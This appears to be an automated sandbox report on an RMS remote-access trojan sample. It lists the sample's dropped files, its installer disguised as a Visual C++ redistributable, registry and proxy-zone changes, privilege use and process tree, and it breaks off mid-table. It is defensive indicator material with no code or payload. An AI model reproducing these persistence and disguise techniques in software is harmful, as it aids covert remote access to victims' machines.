Malware Analysis Report

2024-11-30 19:49

Sample ID 220128-sqmvesfeaj
Target 550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6
SHA256 550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6
Tags
rms evasion rat trojan upx
score
10/10

Analysis Overview

score
10/10

SHA256

550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6

Threat Level: Known bad

The file 550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6 was found to be: Known bad.

Malicious Activity Summary

rms evasion rat trojan upx

RMS

Executes dropped EXE

Stops running service(s)

UPX packed file

Loads dropped DLL

Enumerates connected drives

Drops file in System32 directory

Launches sc.exe

Drops file in Windows directory

Enumerates physical storage devices

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Runs net.exe

Runs ping.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Views/modifies file attributes

Kills process with taskkill

Suspicious behavior: SetClipboardViewer

Enumerates processes with tasklist

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-28 15:19

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-28 15:19

Reported

2022-01-28 16:02

Platform

win10-en-20211208

Max time kernel

146s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe"

Signatures

RMS

trojan rat rms

Stops running service(s)

evasion

UPX packed file

upx

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\sysfiles\dsfvorbisdecoder.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\msvcp90.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rutserv.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rwln.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\vp8encoder.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\RWLN.dll C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
File created C:\Windows\SysWOW64\sysfiles\microsoft.vc90.crt.manifest C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\msvcr90.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rfusclient.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\SysWOW64\RWLN.dll C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
File created C:\Windows\SysWOW64\sysfiles\dsfvorbisencoder.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\msimg32.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rasadhlp.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\gdiplus.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\oledlg.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\ripcserver.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\vp8decoder.dll C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\{AB7AA605-500F-4153-8207-FB5563419112}\ARPPRODUCTICON.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\AdobeUpdates\id.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\AdobeUpdates\group.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\Installer\f75f03d.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{AB7AA605-500F-4153-8207-FB5563419112} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f75f040.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\AdobeUpdates\mac.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\AdobeUpdates\mac.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\AdobeUpdates\comp.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\Installer\f75f03d.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF5BB.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIFB3A.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\AdobeUpdates\comp.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\AdobeUpdates\group.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\Installer\{AB7AA605-500F-4153-8207-FB5563419112}\ARPPRODUCTICON.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\AdobeUpdates\id.txt C:\Windows\SysWOW64\cmd.exe N/A

Launches sc.exe

Enumerates physical storage devices

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Kills process with taskkill

evasion

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@C:\Windows\SysWOW64\FirewallControlPanel.dll,-12122 = "Windows Firewall" C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\ProductName = "Microsoft Visual C++ 2008 Redistributable - x86 10.0.743894.2047" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Media\1 = "DISK1;1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\506AA7BAF00535142870BF5536141921\Remote_Office_Manager C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\ProductIcon = "C:\\Windows\\Installer\\{AB7AA605-500F-4153-8207-FB5563419112}\\ARPPRODUCTICON.exe" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\PackageName = "rms5.2.1.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Media\DiskPrompt = "[1]" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\506AA7BAF00535142870BF5536141921 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Language = "1049" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17\506AA7BAF00535142870BF5536141921 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\PackageCode = "558594499A0F7BE41A10BED2C55AA173" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Version = "97648640" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList C:\Windows\system32\msiexec.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: SetClipboardViewer

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2564 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 2564 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 2564 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 3824 wrote to memory of 4084 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 3824 wrote to memory of 4084 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 3824 wrote to memory of 4084 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 4084 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 4084 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 4084 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 3560 wrote to memory of 1036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3560 wrote to memory of 1036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3560 wrote to memory of 1036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3560 wrote to memory of 1428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 3560 wrote to memory of 1428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 3560 wrote to memory of 1428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 3560 wrote to memory of 2292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 3560 wrote to memory of 2292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 3560 wrote to memory of 2292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 3560 wrote to memory of 1068 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 3560 wrote to memory of 1068 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 3560 wrote to memory of 1068 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 3560 wrote to memory of 1736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 3560 wrote to memory of 1736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 3560 wrote to memory of 1736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 3560 wrote to memory of 3260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3560 wrote to memory of 3260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3560 wrote to memory of 3260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3260 wrote to memory of 3984 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3260 wrote to memory of 3984 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3260 wrote to memory of 3984 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3560 wrote to memory of 3792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 3560 wrote to memory of 3792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 3560 wrote to memory of 3792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 3560 wrote to memory of 3064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3560 wrote to memory of 3064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3560 wrote to memory of 3064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3560 wrote to memory of 3244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 3560 wrote to memory of 3244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 3560 wrote to memory of 3244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 3560 wrote to memory of 2772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3560 wrote to memory of 2772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3560 wrote to memory of 2772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3560 wrote to memory of 3544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3560 wrote to memory of 3544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3560 wrote to memory of 3544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3560 wrote to memory of 3868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 3560 wrote to memory of 3868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 3560 wrote to memory of 3868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 3560 wrote to memory of 2648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3560 wrote to memory of 2648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3560 wrote to memory of 2648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3560 wrote to memory of 3136 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3560 wrote to memory of 3136 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3560 wrote to memory of 3136 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3560 wrote to memory of 1352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 3560 wrote to memory of 1352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 3560 wrote to memory of 1352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 3560 wrote to memory of 916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3560 wrote to memory of 916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
